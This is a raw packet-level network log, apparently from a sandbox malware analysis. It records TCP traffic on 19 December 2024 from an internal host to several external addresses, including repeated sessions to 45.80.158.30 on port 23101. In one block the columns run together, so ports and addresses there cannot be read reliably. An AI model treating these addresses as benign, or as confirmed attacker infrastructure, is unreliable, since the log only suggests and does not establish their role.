Dec 19, 2024 13:19:33.499955893 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.500046968 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.529685020 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.529719114 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.529778957 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.529815912 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.529844046 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.529927969 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.562249899 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.562294006 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.562349081 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.562385082 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.562416077 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.562438965 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.658509016 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.658571959 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.658723116 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.658723116 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.658786058 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.658850908 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.702997923 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.703071117 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.703214884 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.703214884 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.703279018 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.703358889 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.723818064 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.723891020 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.724061966 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.724061966 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.724127054 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.724191904 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.736063957 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.736109018 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.736279011 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.736279011 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.736342907 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.736403942 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.750390053 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.750471115 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.750596046 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.750596046 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.750660896 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.750724077 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.764586926 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.764630079 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.764806986 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.764806986 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.764870882 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.764939070 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.878204107 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.878277063 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.878304005 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.878367901 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.878410101 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.878432035 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.891189098 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.891268015 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.891278028 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.891298056 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.891344070 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.891344070 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.903501034 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.903544903 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.903640032 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.903640985 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.903701067 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.904437065 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.916018963 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.916062117 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.916115046 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.916177988 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.916218042 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.916311026 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.928493977 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.928535938 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.928740978 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.928740978 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.928803921 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.928870916 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.939943075 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.939984083 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.940135956 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.940135956 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.940201044 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.940584898 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.952366114 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.952409983 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.952456951 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.952519894 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:33.952554941 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:33.952676058 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.041172981 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.041270971 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.041393042 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.041393042 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.041456938 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.042546988 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.070096970 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.070156097 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.070198059 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.070261955 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.070306063 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.071074009 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.079030037 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.079087973 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.079246998 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.079246998 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.079360962 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.079545975 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.086997986 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.087042093 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.087213993 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.087213993 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.087276936 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.087429047 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.096350908 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.096401930 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.096575975 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.096575975 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.096638918 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.096702099 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.105308056 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.105350018 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.105542898 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.105544090 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.105607986 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.105674028 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.113873005 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.113914967 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.114063025 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.114063025 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.114126921 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.114249945 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.122957945 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.122999907 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.123143911 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.123143911 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.123208046 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.123342037 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.233661890 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.233730078 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.233911991 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.233911991 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.233973980 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.234039068 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.262684107 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.262742043 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.262931108 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.263269901 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.263360023 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.263417959 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.269042015 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.269124031 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.269270897 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.269270897 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.269375086 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.269423962 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.276529074 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.276607990 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.276613951 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.276680946 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.276717901 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.277226925 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.284159899 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.284212112 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.284353971 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.284353971 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.284419060 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.284728050 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.290669918 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.290712118 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.290877104 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.290877104 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.290941000 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.291783094 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.298791885 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.298834085 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.298989058 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.298989058 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.299052954 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.299140930 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.305432081 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.305473089 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.305613041 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.305613995 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.305676937 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.306031942 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.425256014 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.425318956 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.425483942 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.425483942 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.425546885 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.425622940 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.454797983 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.454883099 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.455035925 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.455035925 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.455099106 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.455434084 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.461546898 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.461626053 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.461642027 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.461710930 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.461746931 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.461824894 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.469005108 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.469070911 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.469248056 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.469248056 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.469341993 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.469404936 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.475601912 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.475662947 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.475692034 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.475759983 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.475796938 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.476056099 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.483057022 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.483114004 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.483256102 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.483256102 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.483345985 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.483622074 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.484165907 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.484227896 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.484244108 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.484344006 CET443497375.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:19:34.484401941 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.484606028 CET49737443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:19:34.900541067 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:35.020385027 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:35.020541906 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:35.026154995 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:35.145946026 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:36.302884102 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:36.355635881 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:36.537569046 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:36.541081905 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:36.660970926 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:36.661596060 CET4973923101192.168.2.445.80.158.30
Dec 19, 2024 13:19:36.781848907 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:37.098927021 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:37.100500107 CET  49739  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:37.220160007 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:37.291038036 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:37.339972019 CET  49739  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:37.542532921 CET  49740     80  192.168.2.4      178.237.33.50
Dec 19, 2024 13:19:37.663228035 CET     80  49740  178.237.33.50    192.168.2.4
Dec 19, 2024 13:19:37.663338900 CET  49740     80  192.168.2.4      178.237.33.50
Dec 19, 2024 13:19:37.663444042 CET  49740     80  192.168.2.4      178.237.33.50
Dec 19, 2024 13:19:37.782890081 CET     80  49740  178.237.33.50    192.168.2.4
Dec 19, 2024 13:19:38.920955896 CET     80  49740  178.237.33.50    192.168.2.4
Dec 19, 2024 13:19:38.921139956 CET  49740     80  192.168.2.4      178.237.33.50
Dec 19, 2024 13:19:38.935302973 CET  49739  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:39.055141926 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:39.921674967 CET     80  49740  178.237.33.50    192.168.2.4
Dec 19, 2024 13:19:39.921993971 CET  49740     80  192.168.2.4      178.237.33.50
Dec 19, 2024 13:19:42.633899927 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:42.636599064 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:42.756488085 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:42.756576061 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:42.759691954 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:42.825287104 CET  23101  49739  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:42.825352907 CET  49739  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:42.832293987 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:42.879246950 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:42.952162027 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:42.952251911 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:42.955763102 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:43.075361013 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:44.041147947 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:44.152578115 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.415528059 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.419687986 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.462665081 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.469485998 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.528810024 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.539273977 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.539716005 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.589266062 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.589328051 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.648709059 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.648722887 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.648731947 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.648802042 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.648859024 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.649015903 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.649029016 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.649039030 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.649046898 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.649065018 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.649112940 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:45.659004927 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.659018040 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.659233093 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.709017038 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.768853903 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.768867970 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.768884897 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.768894911 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.768987894 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.769037008 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.769109011 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.769145966 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:45.769217014 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:46.434062004 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:46.554800987 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:46.850529909 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:46.885994911 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:46.887433052 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:47.005656004 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005671024 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005709887 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005748987 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005798101 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005861044 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005928993 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.005939007 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.006052971 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.006062031 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.125924110 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.125978947 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.126152992 CET  23101  49742  45.80.158.30     192.168.2.4
